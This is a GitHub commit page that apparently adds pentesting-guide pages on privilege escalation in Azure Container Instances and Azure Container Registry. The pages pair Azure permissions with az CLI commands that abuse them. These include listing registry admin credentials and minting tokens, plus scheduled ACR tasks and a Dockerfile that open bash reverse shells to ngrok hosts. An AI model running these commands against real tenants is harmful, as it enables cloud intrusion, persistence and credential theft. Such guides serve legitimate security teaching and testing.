-
Notifications
You must be signed in to change notification settings - Fork 267
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
f7bbd56
commit edbb9a8
Showing
6 changed files
with
440 additions
and
4 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
76 changes: 76 additions & 0 deletions
76
...-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,76 @@ | ||
| # Az - Azure Container Instances Privesc | ||
|
|
||
| {{#include ../../../banners/hacktricks-training.md}} | ||
|
|
||
| ## Azure Container Instances | ||
|
|
||
| Fore more information check: | ||
|
|
||
| {{#ref}} | ||
| ../az-services/az-container-instances.md | ||
| {{#endref}} | ||
|
|
||
| ### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action` | ||
|
|
||
| These permissions allow the user to **execute a command** in a running container. This can be used to **escalate privileges** in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container. | ||
|
|
||
| To execute a `ls` and get the output is as simple as: | ||
|
|
||
| ```bash | ||
| az container exec --name <container-name> --resource-group <res-group> --exec-command 'ls' | ||
| ``` | ||
|
|
||
| It's also possible to **read the output** of the container with: | ||
|
|
||
| ```bash | ||
| az container attach --name <container-name> --resource-group <res-group> | ||
| ``` | ||
|
|
||
| Or get the logs with: | ||
|
|
||
| ```bash | ||
| az container logs --name <container-name> --resource-group <res-group> | ||
| ``` | ||
|
|
||
| ### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` | ||
|
|
||
| These permissions allows to **attach a user managed identity** to a container group. This is very useful to escalate privileges in the container. | ||
|
|
||
| To attach a user managed identity to a container group: | ||
|
|
||
| ```bash | ||
| az rest \ | ||
| --method PATCH \ | ||
| --url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \ | ||
| --body '{ | ||
| "identity": { | ||
| "type": "UserAssigned", | ||
| "userAssignedIdentities": { | ||
| "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>": {} | ||
| } | ||
| } | ||
| }' \ | ||
| --headers "Content-Type=application/json" | ||
| ``` | ||
|
|
||
| ### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` | ||
|
|
||
| These permission allows to **create or update a container group** with a **user managed identity** attached to it. This is very useful to escalate privileges in the container. | ||
|
|
||
| ```bash | ||
| az container create \ | ||
| --resource-group <res-group>> \ | ||
| --name nginx2 \ | ||
| --image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \ | ||
| --assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>" \ | ||
| --restart-policy OnFailure \ | ||
| --os-type Linux \ | ||
| --cpu 1 \ | ||
| --memory 1.0 | ||
| ``` | ||
|
|
||
| Moreover, it's also possible to update an existing container group adding for example the **`--command-line` argument** with a reverse shell. | ||
|
|
||
| {{#include ../../../banners/hacktricks-training.md}} | ||
|
|
||
|
|
143 changes: 143 additions & 0 deletions
143
...g-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,143 @@ | ||
| # Az - Azure Container Registry Privesc | ||
|
|
||
| {{#include ../../../banners/hacktricks-training.md}} | ||
|
|
||
| ## Azure Container Registry | ||
|
|
||
| Fore more information check: | ||
|
|
||
| {{#ref}} | ||
| ../az-services/az-container-registry.md | ||
| {{#endref}} | ||
|
|
||
| ### `Microsoft.ContainerRegistry/registries/listCredentials/action` | ||
|
|
||
| This permission allows the user to list the admin credentials of the ACR. This is useful to **get full access** over the registry | ||
|
|
||
| ```bash | ||
| az rest --method POST \ | ||
| --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview" | ||
| ``` | ||
|
|
||
| In case the admin credentials aren't enabled, you will also need the permission `Microsoft.ContainerRegistry/registries/write` to enable them with: | ||
|
|
||
| ```bash | ||
| az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}' | ||
| ``` | ||
|
|
||
|
|
||
| ### `Microsoft.ContainerRegistry/registries/tokens/write`, `Microsoft.ContainerRegistry/registries/generateCredentials/action` | ||
|
|
||
| These permissions allow the user to **create a new token** with passwords to access the registry. | ||
|
|
||
| To use the `az cli`to generate it as in the following example you will also need the permissions `Microsoft.ContainerRegistry/registries/read`, `Microsoft.ContainerRegistry/registries/scopeMaps/read`, `Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read`, `Microsoft.ContainerRegistry/registries/tokens/read` | ||
|
|
||
| ```bash | ||
| az acr token create \ | ||
| --registry <registry-name> \ | ||
| --name <token-name> \ | ||
| --scope-map _repositories_admin | ||
| ``` | ||
|
|
||
|
|
||
| ### `Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action`, `Microsoft.ContainerRegistry/registries/scheduleRun/action`, `Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action` | ||
|
|
||
| These permissions allow the user to **build and run an image** in the registry. This can be used to **execute code** in the container. | ||
|
|
||
| >[!WARNING] | ||
| > However, the image will be executed in a **sandboxed environment** and **without access to the metadata service**. This means that the container will not have access to the **instance metadata** so this isn't really useful to escalate privileges | ||
| ```bash | ||
| # Build | ||
| echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile | ||
| az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null | ||
| ``` | ||
|
|
||
|
|
||
| ### `Microsoft.ContainerRegistry/registries/tasks/write` | ||
|
|
||
| This is the main permission that allows to create and update a task in the registry. This can be used to **execute a code inside a container with a managed identity attached to it** in the container. | ||
|
|
||
| This is the example on how to execute a reverseh shell in a container with the **system managed** identity attached to it: | ||
|
|
||
| ```bash | ||
| az acr task create \ | ||
| --registry <registry-name> \ | ||
| --name reverse-shell-task \ | ||
| --image rev/shell:v1 \ | ||
| --file ./Dockerfile \ | ||
| --context https://github.com/carlospolop/Docker-rev.git \ | ||
| --assign-identity \ | ||
| --commit-trigger-enabled false \ | ||
| --schedule "*/1 * * * *" | ||
| ``` | ||
|
|
||
| Another way to get a RCE from a task without using an external repository is to use the `az acr task create` command with the `--cmd` flag. This will allow you to run a command in the container. For example, you can run a reverse shell with the following command: | ||
|
|
||
| ```bash | ||
| az acr task create \ | ||
| --registry <registry-name> \ | ||
| --name reverse-shell-task-cmd \ | ||
| --image rev/shell2:v1 \ | ||
| --cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \ | ||
| --schedule "*/1 * * * *" \ | ||
| --context /dev/null \ | ||
| --commit-trigger-enabled false \ | ||
| --assign-identity | ||
| ``` | ||
|
|
||
| > [!TIP] | ||
| > Note that to assign the system managed identity you don't need any special permission, although it must have been enabled before in the registry and assigned some permissions for it to be useful. | ||
| To assign a **user managed identity also** you would need the permission `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` to do: | ||
|
|
||
| ```bash | ||
| az acr task create \ | ||
| --registry <registry-name> \ | ||
| --name reverse-shell-task \ | ||
| --image rev/shell:v1 \ | ||
| --file ./Dockerfile \ | ||
| --context https://github.com/carlospolop/Docker-rev.git \ | ||
| --assign-identity \[system\] "/subscriptions/<subscription-id>>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \ | ||
| --commit-trigger-enabled false \ | ||
| --schedule "*/1 * * * *" | ||
| ``` | ||
|
|
||
| To **update** the repo of an existent task you can do: | ||
|
|
||
| ```bash | ||
| az acr task update \ | ||
| --registry <registry-name> \ | ||
| --name reverse-shell-task \ | ||
| --context https://github.com/your-user/your-repo.git | ||
| ``` | ||
|
|
||
|
|
||
| ### `Microsoft.ContainerRegistry/registries/importImage/action` | ||
|
|
||
| With this permission it's possible to **import an image to the azure registry**, even without having the image locally. However, note that you **cannot import an image with a tag** that already exists in the registry. | ||
|
|
||
| ```bash | ||
| # Push with az cli | ||
| az acr import \ | ||
| --name <registry-name> \ | ||
| --source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import | ||
| ``` | ||
|
|
||
| In order to **untag or delete a specific image tag** from the registry you can use the following command. However, note that you will need a user or token with **enough permissions** to do it: | ||
|
|
||
| ```bash | ||
| az acr repository untag \ | ||
| --name <registry-name> \ | ||
| --image <image-name>:<tag> | ||
|
|
||
| az acr repository delete \ | ||
| --name <registry-name> \ | ||
| --image <image-name>:<tag> | ||
| ``` | ||
|
|
||
|
|
||
|
|
||
| {{#include ../../../banners/hacktricks-training.md}} | ||
|
|
||
|
|
47 changes: 47 additions & 0 deletions
47
src/pentesting-cloud/azure-security/az-services/az-container-instances.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,47 @@ | ||
| # Az - Container Instances | ||
|
|
||
| {{#include ../../../../banners/hacktricks-training.md}} | ||
|
|
||
| ## Basic Information | ||
|
|
||
| Azure Container Instances (ACI) provide a **serverless, on-demand way** to run **containers** in the Azure cloud. You can **deploy** single or multiple containers in a group with **scalable compute**, **networking options**, and the flexibility to connect to **other Azure services** (like Storage, Virtual Networks, or Container Registries). | ||
|
|
||
| As they are **ephemeral** workloads, you don't need to manage the underlying VM infrastructure — Azure handles that for you. However, from an **offensive security perspective**, it's crucial to understand how **permissions**, **identities**, **network configurations**, and **logs** can reveal attack surfaces and potential misconfigurations. | ||
|
|
||
|
|
||
| ### Configurations | ||
|
|
||
| - In order to create a container it's possible to use a public image, a container image from an Azure Container Registry or an external repository, which might **require to configure a password** to access it. | ||
| - Regarding networking it can also have a **public IP** or be **private endpoints**. | ||
| - It's also possible to configure common docker settings like: | ||
| - **Environment variables** | ||
| - **Volumes** (even from Azure Files) | ||
| - **Ports** | ||
| - **CPU and memory limits** | ||
| - **Restart policy** | ||
| - **Run as privileged** | ||
| - **Command line to run** | ||
| - ... | ||
|
|
||
|
|
||
| ## Enumeration | ||
|
|
||
| > [!WARNING] | ||
| > When enumerating ACI, you can reveal sensitive configurations such as **environment variables**, **network details**, or **managed identities**. Be cautious with logging or displaying them. | ||
| ```bash | ||
| # List all container instances in the subscription | ||
| az container list | ||
|
|
||
| # Show detailed information about a specific container instance | ||
| az container show --name <container-name> --resource-group <res-group> | ||
|
|
||
| # Fetch logs from a container | ||
| az container logs --name <container-name> --resource-group <res-group> | ||
|
|
||
| # Execute a command in a running container and get the output | ||
| az container exec --name <container-name> --resource-group <res-group> --exec-command "ls" | ||
|
|
||
| # Get yaml configuration of the container group | ||
| az container export --name <container-name> --resource-group <res-group> | ||
| ``` |
Oops, something went wrong.